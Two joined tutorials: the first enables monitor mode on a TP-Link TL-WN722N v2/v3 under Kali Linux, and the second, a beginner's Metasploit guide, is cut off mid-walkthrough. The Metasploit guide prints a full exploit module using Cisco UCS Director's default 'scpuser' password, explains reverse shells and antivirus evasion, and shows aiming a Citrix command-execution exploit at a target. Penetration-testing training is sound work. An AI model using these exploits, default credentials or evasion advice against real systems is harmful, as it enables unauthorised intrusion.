Some sources may be confusing, and lead you to believe that you can only enable monitor mode on TP-LINK TL-WN722N v1 because it has one of the required chipsets for monitor mode, Atheros AR9271, and that you can’t enable it on V2/V3. You can, however.

To start off, if you’re using a virtual machine, first you’ll have to connect your wireless adapter to your Kali Linux virtual machine.

Set up the Adapter

Next, we’ll run some commands to set up the adapter.

First update and upgrade your package index.

sudo apt update && sudo apt upgrade

Reboot your machine.

sudo reboot

Install Linux headers for your Kali Linux.

sudo apt install linux-headers-$(uname -r)

Run the following commands to install the bc package and remote the r8188eu.ko module.

sudo apt install bc

sudo rmmod r8188eu.ko

Clone the Realtek driver from the aircrack-ng Github repository.

git clone https://github.com/aircrack-ng/rtl8188eus

Run the following commands.

cd rtl8188eus

sudo -i

echo "blacklist r8188eu" > "/etc/modprobe.d/realtek.conf"

exit

reboot

After the reboot run the following commands (we have to cd back into the rtl8188eus directory that we cloned earlier):

cd rtl8188eus

make

sudo make install

sudo modprobe 8188eu

Enable Monitor Mode

To enable monitor mode, run the following commands:

sudo ifconfig wlan0 down

sudo airmon-ng check kill

sudo iwconfig wlan0 mode monitor

sudo ifconfig wlan0 up

sudo iwconfig

Here’s the output you should be seeing. You can see that the adapter is set to Mode: Monitor.

Troubleshooting When Enabling Monitor Mode

In some cases it doesn’t work right away. For example you may get the error Error for wireless request "Set Mode" (8B06) : SET failed on device wlan0 ; Operation not permitted.

The solution that has worked for me every time is the following (credit to this Github user’s comment).

Run the following commands in this order:

sudo ifconfig wlan0 up
sudo rmmod r8188eu.ko
sudo modprobe 8188eu
sudo iwconfig wlan0 mode auto
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up

Now when you check iwconfig you should see the adapter is in monitor mode.

Conclusion

In this tutorial we set up a TP-LINK TL-WN722N V2/V3 adapter to run in monitor mode. If you have any issues or questions then please don’t hesitate to leave a comment. Hope this helped. Thank you.

If you ever tried to exploit some vulnerable systems, chances are you have used Metasploit, or at least, are familiar with the name. It allows you to find information about system vulnerabilities, use existing exploits to penetrate the system, helps create your own exploits, and much more.

In this tutorial, we’ll be covering the basics of Metasploit Framework in detail and show you real examples of how to use this powerful tool to the fullest.

Installing Metasploit

Metasploit is available for Windows and Linux OS, and you can download the source files from the official repository of the tool in Github. If you are running any OS designed for penetration testing, e.g., Kali Linux, it will be pre-installed in your system. We’ll be covering how to use Metasploit Framework version 6 on Kali Linux. However, the basics will remain the same wherever you’re using Metasploit.

Installing Metasploit on Linux

To install Metasploit in Linux you have to get the package metasploit-framework. On Debian and Ubuntu based Linux distros, you can use the apt utility:

apt install metasploit-framework

On CentOS/Redhat you can the yum utility to do the same:

yum install metasploit-framework

Find out the version of Metasploit and updating

If you’re not sure if you have Metasploit or not, you can confirm by typing msfconsole in your terminal:

msfconsole

 _                                                    _
/ \    /\         __                         _   __  /_/ __                                                                                                                                                      
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \                                                                                                                                                     
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|                                                                                                                                                    
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_                                                                                                                                                    
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\                                                                                                                                                   
                                                                                                                                                                                                                 

       =[ metasploit v6.1.27-dev                          ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Tired of setting RHOSTS for modules? Try 
globally setting it with setg RHOSTS x.x.x.x

Metasploit Tip: Start commands with a space to avoid saving them to history

As you can see my machine already has Metasploit Framework installed.

Metasploit changes its greeting messages every time you fire up the Metasploit Framework with the msfconsole command, so you might see a different greeting message when you run it.

You can also find out which version is installed once the program loads. Type in version and hit enter to get the answer:

version

Framework: 6.1.27-dev
Console  : 6.1.27-dev

I am using version 6. If you haven’t updated your Metasploit anytime soon, it’s a good idea to update it before starting to use it. This is because if the tool is old then the updated exploits will not get added to the database of your Metasploit Framework. You can update the program by the msfupdate command:

msf6 > msfupdate

[*] exec: msfupdate

msfupdate is no longer supported when Metasploit is part of the operating

system. Please use ‘apt update; apt install metasploit-framework’

As you can see the msfupdate command is not supported. This happened because Metasploit is already a part of the operating system in the Kali Linux updated versions. If you’re using older versions of the Kali Linux, this command will work fine for your system.

Now that you know how to install and update the Metasploit framework, let’s begin learning some of the basics related to Metasploit.

Basics of Penetration testing

Before we begin, let’s familiarize ourselves with some of the steps of a penetration test briefly. If you’re already familiar with the concept then you can just skip ahead to the good part. Let’s list some of the fundamental steps in penetration testing:

1. Information Gathering / Reconnaissance
2. Vulnerability Analysis
3. Exploitation
4. Post Exploitation
5. Report

1. Information gathering / Reconnaissance

At the very beginning of any penetration testing, information gathering is done. The more information you can gather about the target, the better it will be for you to know the target system and use the information later in the process. Information may include crucial information like the open ports, running services, or general information such as the domain name registration information. Various techniques and tools are used for gathering information about the target such as – nmap, zenmap, whois, nslookup, dig, maltego, etc.

One of the most used tools for information gathering and scanning is the nmap or Network Mapper utility. For a comprehensive tutorial for information gathering and nmap which you can check out from here.

2. Vulnerability Analysis

In this step, the potential vulnerabilities of the target are analyzed for further actions. Not all the vulnerabilities are of the same level. Some vulnerabilities may give you entire access to the system once exploited while some may only give you some normal information about the system. The vulnerabilities that might lead to some major results are the ones to go forward with from here. This is the step where Metasploit gives you a useful database to work with.

3. Exploitation

After the identified vulnerabilities have been analyzed, this is the step to take advantage of the vulnerabilities.

In this step, specific programs/exploits are used to attack the machine with the vulnerabilities.

You might wonder, where do these exploits come from?

Exploits come from many sources. One of the primary source is the vulnerability and exploit researchers. People do it because there is a lot at stake here i.e., there may be huge sums of money involved as a bounty.

Now, you may ask if the vulnerabilities are discovered, aren’t those application already fixed? The answer is yes, they are. But the fix comes around in the next update of the application.

Those who are already using the outdated version might not get the update and remains vulnerable to the exploits. The Metasploit Framework is the most suitable tool for this step. It gives you the option to choose from thousands of exploits and use them directly from the Metasploit console. New exploits are updated and incorporated in Metasploit regularly. You may also add some other exploits from online exploit databases like Exploit-DB.

Further, not all the exploits are ready-made for you to use. Sometimes you might have to craft your own exploit to evade security systems and intrusion detection systems. Metasploit also has different options for you to explore on this regard.

4. Post Exploitation

This is the step after you’ve already completed exploiting the target system. You’ve got access to the system and this is where you will decide what to do with the system. You may have got access to a low privilege user. You will try to escalate your privilege in this step. You may also keep a backdoor the victim machine to allow yourself to enter the system later whenever you want. Metasploit has numerous functionalities to help you in this step as well.

5. Report

This is the step that many penetration testers will have to complete. After carrying out their testing, the company or the organization will require them to write a detailed report about the testing and improvement to be done.

Now, after the long wait, let’s get into the basics of the actual program – Metasploit Framework.

Basics of Metasploit Framework

In this section, we’ll learn all the basics related to Metasploit Framework. This will help us understand the terminologies related to the program and use the basic commands to navigate through.

Modules of Metasploit Framework

As discussed earlier, Metasploit can be used in most of the penetration testing steps. The core functionalities that Metasploit provides can be summarized by some of the modules:

1. Exploits
2. Payloads
3. Auxiliaries
4. Encoders

Now we’ll discuss each of them and explain what they mean.

1. Exploits

Exploit is the program that is used to attack the vulnerabilities of the target. There is a large database for exploits on Metasploit Framework. You can search the database for the exploits and see the information about how they work, the time they were discovered, how effective they are, and so on.

2. Payloads

Payloads perform some tasks after the exploit runs. There are different types of payloads that you can use. For example, you could use the reverse shell payload, which basically generates a shell/terminal/cmd in the victim machine and connects back to the attacking machine.

Another example of a payload would be the bind shell. This type of shell creates a listening port on the victim machine, to which the attacker machine then connects. The advantage of a reverse shell over the bind shell is that the majority of the system firewalls generally do not block the outgoing connections as much as they block the incoming ones.

Metasploit Framework has a lot of options for payloads. Some of the most used ones are the reverse shell, bind shell, meterpreter, etc.

3. Auxiliaries

These are the programs that do not directly exploit a system. Rather they are built for providing custom functionalities in Metasploit. Some auxiliaries are sniffers, port scanners, etc. These may help you scan the victim machine for information gathering purposes. For example, if you see a victim machine is running ssh service, but you could not find out what version of ssh it is using – you could scan the port and get the version of ssh using auxiliary modules.

4. Encoders

Metasploit also provides you with the option to use encoders that will encrypt the codes in such a way that it becomes obscure for the threat detection programs to interpret. They will self decrypt and become original codes when executed. However, the encoders are limited and the anti-virus has many signatures of them already in their databases. So, simply using an encoder will not guarantee anti-virus evasion. You might get past some of the anti-viruses simply using encoders though. You will have to get creative and experiment changing the payload so it does not get detected.

Components of Metasploit Framework

Metasploit is open-source and it is written in Ruby. It is an extensible framework, and you can build custom features of your likings using Ruby. You can also add different plugins. At the core of the Metaslpoit framework, there are some key components:

1. msfconsole
2. msfdb
3. msfvenom
4. meterpreter

Let’s talk about each of these components.

1. msfconsole

This is the command line interface that is used by the Metasploit Framework. It enables you to navigate through all the Metasploit databases at ease and use the required modules. This is the command that you entered before to get the Metasploit console.

2. msfdb

Managing all the data can become a hurdle real quick, which is why Metasploit Framework gives you the option to use PostgreSQL database to store and access your data quickly and efficiently. For example, you may store and organize your scan results in the database to access them later. You can take a look at this tutorial to learn more about this tool – https://null-byte.wonderhowto.com/how-to/use-metasploits-database-stay-organized-store-information-while-hacking-0192643/

3. msfvenom

This is the tool that mimics its name and helps you create your own payloads (venoms to inject in your victim machine). This is important since your payload might get detected as a threat and get deleted by threat detection software such as anti-viruses or anti-malware.

This happens because the threat detection systems already has stored fingerprints of many malicious payloads. There are some ways you can evade detection. We’ll discuss this in the later section dedicated to msfvenom.

4. meterpreter

meterpreter is an advanced payload that has a lot of functionalities built into it. It communicates using encrypted packets. Furthermore, meterpreter is quite difficult to trace and locate once in the system. It can capture screenshots, dump password hashes, and many more.

Metasploit location on the drive

Metasploit Framework is located in /usr/share/metasploit-framework/ directory. You can find out all about its components and look at the exploit and payload codes. You can also add your own exploits here to access it from the Metasploit console.

Let’s browse through the Metasploit directory:

cd /usr/share/metasploit-framework

Type in ls to see the contents of the directory:

ls

app                           msfconsole       Rakefile
config                        msfd             ruby
data                          msfdb            script-exploit
db                            msf-json-rpc.ru  script-password
documentation                 msfrpc           script-recon
Gemfile                       msfrpcd          scripts
Gemfile.lock                  msfupdate        tools
lib                           msfvenom         vendor
metasploit-framework.gemspec  msf-ws.ru
modules                       plugins

As you can see, there is a directory called modules, which should contain the exploits, payloads, auxiliaries, encoders, as discussed before. Let’s get into it:

cd modules

ls

auxiliary  encoders  evasion  exploits  nops  payloads  post

All the modules discussed are present here. However, evasion, nops, and post are the additional entries. The evasion module is a new entry to the Metasploit Framework, which helps create payloads that evade anti-virus (AV) detection. Nop stands for no operation, which means the CPU will just move to the next operation. Nops help create randomness in the payload – as adding them does not change the functionality of the program.

Finally, the post module contains some programs that you might require post-exploitation. For example, you might want to discover if the host you exploited is a Virtual Machine or a Physical Computer. You can do this with the checkvm module found in the post category. Now you can browse all the exploits, payloads, or others and take a look at their codes. Let’s navigate to the exploits directory and select an exploit. Then we’ll take a look at the codes of that exploit.

cd exploits

ls

aix        dialup                     firefox  mainframe  qnx
android    example_linux_priv_esc.rb  freebsd  multi      solaris
apple_ios  example.py                 hpux     netware    unix
bsd        example.rb                 irix     openbsd    windows
bsdi       example_webapp.rb          linux    osx

What you’re seeing now are the categories of the exploits. For example, the linux directory contains all the exploits that are available for Linux systems.

cd linux

ls

antivirus  games  imap   mysql     pptp   samba  ssh
browser    http   local  pop3      proxy  smtp   telnet
ftp        ids    misc   postgres  redis  snmp   upnp

Let’s take a look at the exploits for ssh.

cd ssh

ls

ceragon_fibeair_known_privkey.rb
cisco_ucs_scpuser.rb
exagrid_known_privkey.rb
f5_bigip_known_privkey.rb
ibm_drm_a3user.rb
loadbalancerorg_enterprise_known_privkey.rb
mercurial_ssh_exec.rb
microfocus_obr_shrboadmin.rb
quantum_dxi_known_privkey.rb
quantum_vmpro_backdoor.rb
solarwinds_lem_exec.rb
symantec_smg_ssh.rb
vmware_vdp_known_privkey.rb
vyos_restricted_shell_privesc.rb

As you can see, all the exploits are written in Ruby, and thus, the extension of the files is .rb. Now let’s look at the code of a specific exploit using the cat command, which outputs the content directly on the terminal:

cat cisco_ucs_scpuser.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/ssh'
require 'net/ssh/command_stream'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SSH

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Cisco UCS Director default scpuser password",
      'Description'    => %q{
        This module abuses a known default password on Cisco UCS Director. The 'scpuser'
        has the password of 'scpuser', and allows an attacker to login to the virtual appliance
        via SSH.
        This module  has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0.
        Note that Cisco also mentions in their advisory that their IMC Supervisor and
        UCS Director Express are also affected by these vulnerabilities, but this module
        was not tested with those products.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>'        # Vulnerability discovery and Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2019-1935' ],
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-usercred' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Aug/36' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Cisco/cisco-ucs-rce.txt' ]
        ],
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'thread'
        },
      'Payload'        =>
        {
          'Compat' => {
            'PayloadType'    => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          [ 'Cisco UCS Director < 6.7.2.0', {} ],
        ],
      'Privileged'     => false,
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2019-08-21'
    ))

    register_options(
      [
        Opt::RPORT(22),
        OptString.new('USERNAME', [true,  "Username to login with", 'scpuser']),
        OptString.new('PASSWORD', [true,  "Password to login with", 'scpuser']),
      ], self.class
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end

  def rhost
    datastore['RHOST']
  end

  def rport
    datastore['RPORT']
  end

  def do_login(user, pass)
    factory = ssh_socket_factory
    opts = {
      :auth_methods    => ['password', 'keyboard-interactive'],
      :port            => rport,
      :use_agent       => false,
      :config          => false,
      :password        => pass,
      :proxy           => factory,
      :non_interactive => true,
      :verify_host_key => :never
    }

    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']

    begin
      ssh = nil
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(rhost, user, opts)
      end
    rescue Rex::ConnectionError
      return
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return
    rescue Net::SSH::AuthenticationFailed
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return
    end

    if ssh
      conn = Net::SSH::CommandStream.new(ssh)
      ssh = nil
      return conn
    end

    return nil
  end

  def exploit
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']

    print_status("#{rhost}:#{rport} - Attempt to login to the Cisco appliance...")
    conn = do_login(user, pass)
    if conn
      print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")
      handler(conn.lsock)
    end
  end
end

You can see the code for the exploit is shown here. The green marked section is the description of the exploit and the yellow marked portion is the options that can be set for this exploit.

The description reveals what function this exploit will perform. As you can see, it exploits a known vulnerability of Cisco UCS Director. The vulnerability is the default password of the machine, which, if unchanged, may be used to gain access to the system. If you are someone who knows Ruby and has a good grasp of how the vulnerability works, you can modify the code and create your own version of the exploit. That’s the power of the Metasploit Framework.

In this way, you can also find out what payloads are there in your Metasploit Framework, add your own in the directory, and modify the existing ones.

Basic commands of Metasploit Framework

Now let’s move on to the fun stuff. In this section, we’ll talk about some of the basic Metasploit commands that you’re going to need all the time.

Fire up the Metasploit console by typing in msfconsole. Now you will see msf6 > indicating you’re in the interactive mode.

msfconsole

I have the msf6 shown here, where 6 represents the version of the framework and console. You can execute regular terminal commands from here as well, which means you don’t have to exit out of Metasploit Framework to perform some other tasks, making it super convenient. Here’s an example – msf6 > ls

[*] exec: ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos

The ls command works as it is intended to. You can use the help command to get a list of commands and their functions. Metasploit has very convenient help descriptions. They are divided into categories and easy to follow.

help

Now, let’s take a look at some important commands.

Show command

If you want to see the modules you currently have in your Metasploit Framework, you can use the show command. Show command will show you specific modules or all the modules. Show command requires an argument to be passed with it. Type in “show -h” to find out what argument the command takes:

show -h

[*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options, favorites
[*] Additional module-specific parameters are: missing, advanced, evasion, targets, actions

For example, you can see all the exploits by using the command in the following way:

show exploits

This will list all the existing exploits, which will be a long list, needless to say. Let’s look at how many encoders are there:

show encoders

Show command can be used inside of any modules to get specific modules that are compatible. You’ll understand this better in the later sections.

Search anything within Metasploit

Let’s imagine you found a service running on an open port on the target machine. If you also know which version of the service that machine is using – you might want to look for already known vulnerabilities of that service.

How do you find out if that service has any vulnerability which has ready-made exploits on Metasploit?

You guessed it – you must use the search utility of Metasploit.

It doesn’t even have to be the exploits, you can also find out payloads, auxiliaries, etc., and you can search the descriptions as well.

Let’s imagine I wanted to find out if Metasploit has anything related to Samba. Samba is an useful cross platform tool that uses the SMB (Server Message Block) protocol. It allows file and other resource sharing between Windows and Unix based-host. Let’s use the search command:

search samba

Matching Modules
================

   #   Name                                                 Disclosure Date  Rank       Check  Description
   -   ----                                                 ---------------  ----       -----  -----------
   0   exploit/unix/webapp/citrix_access_gateway_exec       2010-12-21       excellent  Yes    Citrix Access Gateway Command Execution
   1   exploit/windows/license/calicclnt_getconfig          2005-03-02       average    No     Computer Associates License Client GETCONFIG Overflow
   2   exploit/unix/misc/distcc_exec                        2002-02-01       excellent  Yes    DistCC Daemon Command Execution
   3   exploit/windows/smb/group_policy_startup             2015-01-26       manual     No     Group Policy Script Execution From Shared Resource
   4   post/linux/gather/enum_configs                                        normal     No     Linux Gather Configurations
   5   auxiliary/scanner/rsync/modules_list                                  normal     No     List Rsync Modules
   6   exploit/windows/fileformat/ms14_060_sandworm         2014-10-14       excellent  No     MS14-060 Microsoft Windows OLE Package Manager Code Execution
   7   exploit/unix/http/quest_kace_systems_management_rce  2018-05-31       excellent  Yes    Quest KACE Systems Management Command Injection
   8   exploit/multi/samba/usermap_script                   2007-05-14       excellent  No     Samba "username map script" Command Execution
   9   exploit/multi/samba/nttrans                          2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   10  exploit/linux/samba/setinfopolicy_heap               2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   11  auxiliary/admin/smb/samba_symlink_traversal                           normal     No     Samba Symlink Directory Traversal
   12  auxiliary/scanner/smb/smb_uninit_cred                                 normal     Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
   13  exploit/linux/samba/chain_reply                      2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
   14  exploit/linux/samba/is_known_pipename                2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
   15  auxiliary/dos/samba/lsa_addprivs_heap                                 normal     No     Samba lsa_io_privilege_set Heap Overflow
   16  auxiliary/dos/samba/lsa_transnames_heap                               normal     No     Samba lsa_io_trans_names Heap Overflow
   17  exploit/linux/samba/lsa_transnames_heap              2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
   18  exploit/osx/samba/lsa_transnames_heap                2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   19  exploit/solaris/samba/lsa_transnames_heap            2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   20  auxiliary/dos/samba/read_nttrans_ea_list                              normal     No     Samba read_nttrans_ea_list Integer Overflow
   21  exploit/freebsd/samba/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (*BSD x86)
   22  exploit/linux/samba/trans2open                       2003-04-07       great      No     Samba trans2open Overflow (Linux x86)
   23  exploit/osx/samba/trans2open                         2003-04-07       great      No     Samba trans2open Overflow (Mac OS X PPC)
   24  exploit/solaris/samba/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (Solaris SPARC)
   25  exploit/windows/http/sambar6_search_results          2003-06-21       normal     Yes    Sambar 6 Search Results Buffer Overflow


Interact with a module by name or index. For example info 25, use 25 or use exploit/windows/http/sambar6_search_results 

You can also notice the date and description of the exploit. There is also a metric called rank telling you how good the exploit is. The name is actually also the path of where the module is inside the /usr/share/metasploit-framework/

There is some useful information for the exploits written in the Rank, Check, and Disclosure columns. The rank of an exploit indicates how reliable the exploit is. The check functionality for an exploit lets you check whether the exploit will work or not before actually running it on a host. The disclosure date is the date a particular exploit became publicly available. This is a good indicator of how many systems will be affected by it.

A relatively new exploit will affect many of the machines running the service since they might not have updated the vulnerable application in the short time period.

The use command

After you’ve chosen the module you want to use, you can select the module by the use command followed by the name or the id of the module. Let’s use the first one we got from the search result:

use exploit/unix/webapp/citrix_access_gateway_exec

[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/webapp/citrix_access_gateway_exec) >

You can also specify the number for the module:

use 0

[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(unix/webapp/citrix_access_gateway_exec) > 

Get the description of the module with the info command

If you’re not sure about a module you can always get the description and see what it does. As we showed you earlier, you could get the description by looking at the original code of the module. However, we’re going to show you a much faster and efficient way. For this, you have to use the command info after you’ve entered the use command to select an exploit:

msf6 exploit(unix/webapp/citrix_access_gateway_exec) > info

       Name: Citrix Access Gateway Command Execution
     Module: exploit/unix/webapp/citrix_access_gateway_exec
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2010-12-21

Provided by:
  George D. Gal
  Erwin Paternotte

Available targets:
  Id  Name
  ‐‐  ‐‐‐‐
  0   Automatic

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ‐‐‐‐     ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
  Proxies                   no        A proxy chain of format typ
                                      e:host:port[,type:host:port
                                      ][...]
  RHOSTS                    yes       The target host(s), see htt
                                      ps://github.com/rapid7/meta
                                      sploit-framework/wiki/Using
                                      -Metasploit
  RPORT    443              yes       The target port (TCP)
  SSL      true             yes       Use SSL
  VHOST                     no        HTTP server virtual host

Payload information:
  Space: 127

Description:
  The Citrix Access Gateway provides support for multiple 
  authentication types. When utilizing the external legacy NTLM 
  authentication module known as ntlm_authenticator the Access Gateway 
  spawns the Samba 'samedit' command line utility to verify a user's 
  identity and password. By embedding shell metacharacters in the web 
  authentication form it is possible to execute arbitrary commands on 
  the Access Gateway.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2010-4566
  OSVDB (70099)
  http://www.securityfocus.com/bid/45402
  http://www.vsecurity.com/resources/advisory/20101221-1/

As you can see, the info command shows a detailed description of the module. You can see the description of what it does and what options to use, including explanations for everything. You can also use the show info command to get the same result.

msf6 exploit(unix/webapp/citrix_access_gateway_exec) > show info

See the options you need to specify for the modules

For the modules, you will have to set some of the options. Some options will already be set. You will need to specify options like your target machine IP address, port, and things like this. The options will change according to what module you are using. You can see the options using the options or show options command. Let’s see this in action:

msf6 exploit(unix/webapp/citrix_access_gateway_exec) > options

Module options (exploit/unix/webapp/citrix_access_gateway_exec):

   Name     Current Setting  Required  Description
   ‐‐‐‐     ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   Proxies                   no        A proxy chain of format ty
                                       pe:host:port[,type:host:po
                                       rt][...]
   RHOSTS                    yes       The target host(s), see ht
                                       tps://github.com/rapid7/me
                                       tasploit-framework/wiki/Us
                                       ing-Metasploit
   RPORT    443              yes       The target port (TCP)
   SSL      true             yes       Use SSL
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ‐‐‐‐   ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   LHOST  10.0.2.15        yes       The listen address (an inter
                                     face may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   ‐‐  ‐‐‐‐
   0   Automatic

You can see the options for this specific exploit(unix/webapp/citrix_access_gateway_exec). You can also see the options for the default Payload (cmd/unix/reverse_netcat) for this exploit.

I have marked all the fields with different colors. The names are marked in green color. The current setting for each option is marked in pink. All of the fields are not required for the exploit to function. Some of them are optional. The mandatory ones will be listed as yes in the Required field marked in teal. Many of the options will be already filled out by default. You can either change them or keep them unchanged.

In this example, you can see the RHOSTS option does not have a current setting field value in it. This is where you will have to specify the target IP address. You will learn how to set it with the next command.

Use the set command to set a value to a variable

Set is one of the core commands of the Metasploit console. You can use this command to set context-specific values to a variable. For example, let’s try to set the target IP address for the above RHOSTS option field. Type in set RHOSTS [target IP]:

msf6 exploit(unix/webapp/citrix_access_gateway_exec) > set RHOSTS 192.168.43.111

RHOSTS => 192.168.43.111

Now we’ve successfully set up the value of the RHOSTS variable with the set command. Let’s check if it worked or not. Type in show options:

msf6 exploit(unix/webapp/citrix_access_gateway_exec) > show options

Module options (exploit/unix/webapp/citrix_access_gateway_exec):

   Name     Current Setting  Required  Description
   ‐‐‐‐     ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.43.111   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    443              yes       The target port (TCP)
   SSL      true             yes       Use SSL
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ‐‐‐‐     ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐

   LHOST  192.168.74.128   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   ‐‐  ‐‐‐‐
   0   Automatic

The output shows the RHOSTS variable or option has the target machine IP address that we specified using the set command.

Choose the Payload

After we’ve specified the required options for our exploit, we have to set up the payload that we’ll be sending after the exploit successfully completes. There are a lot of payloads in all of Metasploit database. However, after selecting the exploit, you will get the only payloads that are compatible with the exploit. Here, you can use the show command usefully to see the available payloads:

msf6 exploit(unix/webapp/citrix_access_gateway_exec) > show payloads

Compatible Payloads
===================

   #   Name                                      Disclosure Date  Rank    Check  Description
   -   ‐‐‐‐                                      ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐    ‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   0   payload/cmd/unix/bind_busybox_telnetd                      normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   1   payload/cmd/unix/bind_netcat                               normal  No     Unix Command Shell, Bind TCP (via netcat)
   2   payload/cmd/unix/bind_netcat_gaping                        normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   3   payload/cmd/unix/bind_netcat_gaping_ipv6                   normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   4   payload/cmd/unix/bind_socat_udp                            normal  No     Unix Command Shell, Bind UDP (via socat)
   5   payload/cmd/unix/bind_zsh                                  normal  No     Unix Command Shell, Bind TCP (via Zsh)
   6   payload/cmd/unix/generic                                   normal  No     Unix Command, Generic Command Execution
   7   payload/cmd/unix/pingback_bind                             normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   8   payload/cmd/unix/pingback_reverse                          normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   9   payload/cmd/unix/reverse_bash                              normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   10  payload/cmd/unix/reverse_bash_telnet_ssl                   normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   11  payload/cmd/unix/reverse_bash_udp                          normal  No     Unix Command Shell, Reverse UDP (/dev/udp)
   12  payload/cmd/unix/reverse_ksh                               normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   13  payload/cmd/unix/reverse_ncat_ssl                          normal  No     Unix Command Shell, Reverse TCP (via ncat)
   14  payload/cmd/unix/reverse_netcat                            normal  No     Unix Command Shell, Reverse TCP (via netcat)
   15  payload/cmd/unix/reverse_netcat_gaping                     normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   16  payload/cmd/unix/reverse_python                            normal  No     Unix Command Shell, Reverse TCP (via Python)
   17  payload/cmd/unix/reverse_socat_udp                         normal  No     Unix Command Shell, Reverse UDP (via socat)
   18  payload/cmd/unix/reverse_ssh                               normal  No     Unix Command Shell, Reverse TCP SSH
   19  payload/cmd/unix/reverse_zsh                               normal  No     Unix Command Shell, Reverse TCP (via Zsh)

Now you can choose any of the payloads that are listed. They are all compatible with the exploit. Let’s choose a different one rather than the default one. Here, we’ll use the set command to set the value of the payload variable to the name of the specific payload:

msf6 exploit(unix/webapp/citrix_access_gateway_exec) > set payload payload/cmd/unix/reverse_ssh

payload => cmd/unix/reverse_ssh

